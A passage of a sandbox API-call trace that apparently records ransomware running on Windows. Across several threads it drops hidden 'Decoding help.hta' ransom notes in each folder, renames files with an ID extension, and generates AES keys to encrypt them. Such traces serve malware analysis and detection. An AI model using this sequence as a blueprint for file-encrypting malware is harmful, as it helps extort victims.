(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0059.202] WriteFile (in: hFile=0x5d8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x26f9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x26f9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.495] CloseHandle (hObject=0x5d8) returned 1 [0060.805] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 837 os_tid = 0x910 [0054.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*", lpFindFileData=0x270dfd30 | out: lpFindFileData=0x270dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2e30 [0057.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.466] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x270dfd30 | out: lpFindFileData=0x270dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.466] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0057.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.466] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x270dfd30 | out: lpFindFileData=0x270dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0057.467] lstrcmpW (lpString1=".", lpString2="AU") returned -1 [0057.467] lstrcmpW (lpString1="..", lpString2="AU") returned -1 [0057.467] lstrcmpiW (lpString1="windows", lpString2="AU") returned 1 [0057.467] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" [0057.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned 63 [0057.467] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\", lpString2="AU" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU" [0057.467] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*" [0057.467] GlobalMemoryStatus (in: lpBuffer=0x270dfd10 | out: lpBuffer=0x270dfd10) [0057.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41d84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x96c [0057.469] CloseHandle (hObject=0x96c) returned 1 [0057.469] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x270dfd30 | out: lpFindFileData=0x270dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0057.469] lstrcmpW (lpString1=".", lpString2="Deployment") returned -1 [0057.469] lstrcmpW (lpString1="..", lpString2="Deployment") returned -1 [0057.469] lstrcmpiW (lpString1="windows", lpString2="Deployment") returned 1 [0057.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" [0057.469] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned 63 [0057.469] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\", lpString2="Deployment" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment" [0057.469] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*" [0057.469] GlobalMemoryStatus (in: lpBuffer=0x270dfd10 | out: lpBuffer=0x270dfd10) [0057.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99eadf8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x96c [0057.470] CloseHandle (hObject=0x96c) returned 1 [0057.470] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x270dfd30 | out: lpFindFileData=0x270dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 1 [0057.470] lstrcmpW (lpString1=".", lpString2="jre1.7.0_45") returned -1 [0057.470] lstrcmpW (lpString1="..", lpString2="jre1.7.0_45") returned -1 [0057.470] lstrcmpiW (lpString1="windows", lpString2="jre1.7.0_45") returned 1 [0057.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" [0057.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned 63 [0057.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\", lpString2="jre1.7.0_45" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45" [0057.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*" [0057.470] GlobalMemoryStatus (in: lpBuffer=0x270dfd10 | out: lpBuffer=0x270dfd10) [0057.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b2e248, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x96c [0057.471] CloseHandle (hObject=0x96c) returned 1 [0057.471] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x270dfd30 | out: lpFindFileData=0x270dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 0 [0057.471] FindClose (in: hFindFile=0x5e2e30 | out: hFindFile=0x5e2e30) returned 1 Thread: id = 838 os_tid = 0x3b8 [0054.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*", lpFindFileData=0x2721fd30 | out: lpFindFileData=0x2721fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69acfbd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd60a8740, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd60a8740, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d85d0 [0055.514] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.514] FindNextFileW (in: hFindFile=0x5d85d0, lpFindFileData=0x2721fd30 | out: lpFindFileData=0x2721fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69acfbd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd60a8740, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd60a8740, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.514] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.514] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.514] FindNextFileW (in: hFindFile=0x5d85d0, lpFindFileData=0x2721fd30 | out: lpFindFileData=0x2721fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33e0b300, ftCreationTime.dwHighDateTime=0x1ca5247, ftLastAccessTime.dwLowDateTime=0x6a2fe770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33e0b300, ftLastWriteTime.dwHighDateTime=0x1ca5247, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Tools.v9.0.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0055.514] lstrcpyW (in: lpString1=0x5e50ae8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*" [0055.514] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*") returned 91 [0055.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Decoding help.hta" [0055.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\decoding help.hta")) returned 0xffffffff [0055.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0056.932] WriteFile (in: hFile=0x4d4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2721fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2721fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.441] CloseHandle (hObject=0x4d4) returned 1 [0058.441] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.441] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Office.Tools.v9.0.dll") returned -1 [0058.441] lstrlenW (lpString="Microsoft.Office.Tools.v9.0.dll") returned 31 [0058.441] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*" [0058.441] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*") returned 91 [0058.441] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\", lpString2="Microsoft.Office.Tools.v9.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" [0058.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" [0058.441] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.442] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0058.442] CreateFileMappingA (hFile=0x4d4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x80c [0058.442] CryptAcquireContextA (in: phProv=0x2721fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2721fcec*=0x2aac6440) returned 1 [0060.218] CryptGenKey (in: hProv=0x2aac6440, Algid=0x6610, dwFlags=0x1, phKey=0x2721fce8 | out: phKey=0x2721fce8*=0x6713f0) returned 1 [0060.218] CryptExportKey (in: hKey=0x6713f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2721fbe4, pdwDataLen=0x2721fce4 | out: pbData=0x2721fbe4*, pdwDataLen=0x2721fce4*=0x2c) returned 1 [0060.218] MapViewOfFile (hFileMappingObject=0x80c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17000) returned 0x70f0000 Thread: id = 839 os_tid = 0x968 [0054.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*", lpFindFileData=0x2735fd30 | out: lpFindFileData=0x2735fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52328bf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd33e0960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd33e0960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8650 [0055.516] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.516] FindNextFileW (in: hFindFile=0x5d8650, lpFindFileData=0x2735fd30 | out: lpFindFileData=0x2735fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52328bf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd33e0960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd33e0960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.516] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.516] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.516] FindNextFileW (in: hFindFile=0x5d8650, lpFindFileData=0x2735fd30 | out: lpFindFileData=0x2735fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd31a54c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0055.516] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*" [0055.516] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*") returned 90 [0055.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Decoding help.hta" [0055.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\decoding help.hta")) returned 0xffffffff [0055.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0056.932] WriteFile (in: hFile=0x538, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2735fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2735fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.444] CloseHandle (hObject=0x538) returned 1 [0058.444] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.444] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned -1 [0058.444] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned 60 [0058.444] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*" [0058.444] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*") returned 90 [0058.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\", lpString2="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" [0058.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" [0058.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll"), 